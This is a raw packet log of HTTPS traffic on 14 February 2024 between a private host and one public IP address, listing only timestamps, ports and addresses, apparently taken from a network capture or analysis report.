Feb 14, 2024 09:08:18.106020927 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.106053114 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.106090069 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.106709957 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.106733084 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.106791973 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.106798887 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.106858015 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.108565092 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.108588934 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.108663082 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.108670950 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.108716965 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.109538078 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.109560966 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.109603882 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.109611034 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.109642029 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.109663010 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.111691952 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.111712933 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.111758947 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.111768961 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.111799002 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.111825943 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.112692118 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.112740040 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.112777948 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.112787962 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.112818956 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.112843037 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.114538908 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.114562035 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.114622116 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.114635944 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.114679098 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.115688086 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.115714073 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.115763903 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.115768909 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.115796089 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.115820885 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.117768049 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.117805958 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.117836952 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.117841005 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.117871046 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.117897987 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.118777037 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.118810892 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.118844032 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.118848085 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.118895054 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.118913889 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.120666027 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.120697975 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.120733023 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.120738983 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.120791912 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.120812893 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.121670008 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.121701956 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.121737003 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.121742010 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.121774912 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.121797085 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.123574972 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.123610020 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.123648882 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.123653889 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.123684883 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.123708963 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.125274897 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.125304937 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.125351906 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.125363111 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.125395060 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.125418901 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.126635075 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.126656055 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.126703024 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.126708031 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.126741886 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.126764059 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.128456116 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.128478050 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.128520012 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.128525019 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.128560066 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.128581047 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.129528999 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.129554987 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.129599094 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.129604101 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.129637957 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.129669905 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.131280899 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.131300926 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.131372929 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.131380081 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.131428957 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.132291079 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.132313013 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.132368088 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.132373095 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.132416964 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.134165049 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.134188890 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.134243965 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.134251118 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.134294033 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.135531902 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.135555029 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.135596991 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.135601997 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.135632992 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.135653973 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.137389898 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.137415886 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.137460947 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.137466908 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.137496948 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.137561083 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.138377905 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.138401031 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.138442039 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.138447046 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.138478041 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.138499975 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.140216112 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.140244007 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.140285969 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.140290976 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.140321970 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.140342951 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.142144918 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.142172098 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.142215014 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.142220974 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.142249107 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.142273903 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.143179893 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.143239021 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.143263102 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.143281937 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.143316031 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.143337011 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.144365072 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.144409895 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.144438982 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.144443989 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.144474030 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.144494057 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.146289110 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.146332026 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.146368980 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.146373987 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.146430969 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.146430969 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.148174047 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.148222923 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.148262978 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.148267984 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.148297071 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.148323059 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.149142981 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.149183989 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.149213076 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.149218082 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.149250031 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.149266958 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.150999069 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.151038885 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.151078939 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.151087046 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.151117086 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.151140928 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.152796030 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.152843952 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.152882099 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.152889013 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.152916908 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.152940035 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.154176950 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.154226065 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.154256105 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.154263020 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.154289961 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.154313087 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.155169010 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.155209064 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.155242920 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.155246973 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.155282021 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.155312061 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.157011986 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.157057047 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.157093048 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.157098055 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.157129049 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.157151937 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.158732891 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.158782959 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.158817053 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.158822060 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.158854008 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.158873081 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.159926891 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.159965992 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.160001993 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.160007000 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.160036087 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.160057068 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.161425114 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.161478043 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.161504984 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.161509991 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.161540031 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.161565065 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.162700891 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.162750959 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.162815094 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.162822962 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.162864923 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.164382935 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.164428949 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.164463043 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.164468050 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.164501905 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.164522886 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.165503979 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.165544033 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.165580034 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.165585995 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.165615082 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.165637016 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.167359114 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.167402029 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.167434931 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.167440891 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.167469978 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.167490005 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.168319941 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.168361902 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.168394089 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.168399096 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.168431997 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.168453932 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.169671059 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.169715881 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.169749022 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.169756889 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.169789076 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.169811010 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.170835972 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.170876980 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.170906067 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.170912027 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.170943975 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.170962095 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.172373056 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.172414064 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.172457933 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.172462940 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.172491074 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.172512054 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.173445940 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.173494101 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.173523903 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.173527956 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.173558950 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.173580885 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.174444914 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.174490929 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.174519062 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.174525023 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.174554110 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.174573898 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.176079988 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.176120043 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.176153898 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.176158905 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.176192045 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.176219940 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.177442074 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.177489042 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.177531004 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.177535057 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.177581072 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.177611113 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.178534985 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.178586006 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.178622007 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.178627014 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.178664923 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.178683996 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.179472923 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.179512978 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.179546118 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.179549932 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.179577112 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.179617882 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.180361986 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.180413008 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.180445910 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.180449963 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.180484056 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.180505991 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.182162046 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.182205915 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.182234049 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.182240963 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.182269096 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.182291031 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.183187008 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.183226109 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.183254957 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.183263063 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.183291912 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.183310986 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.184094906 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.184134960 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.184168100 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.184185982 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.184207916 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.184230089 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.184940100 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.184981108 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.185012102 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.185024977 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.185050011 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.185072899 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.186906099 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.186947107 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.186980009 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.187000036 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.187016010 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.187036037 CET	49712	443	192.168.2.5	172.67.215.45
Feb 14, 2024 09:08:18.187683105 CET	443	49712	172.67.215.45	192.168.2.5
Feb 14, 2024 09:08:18.187731028 CET	443	49712	172.67.215.45	192.168.2.5
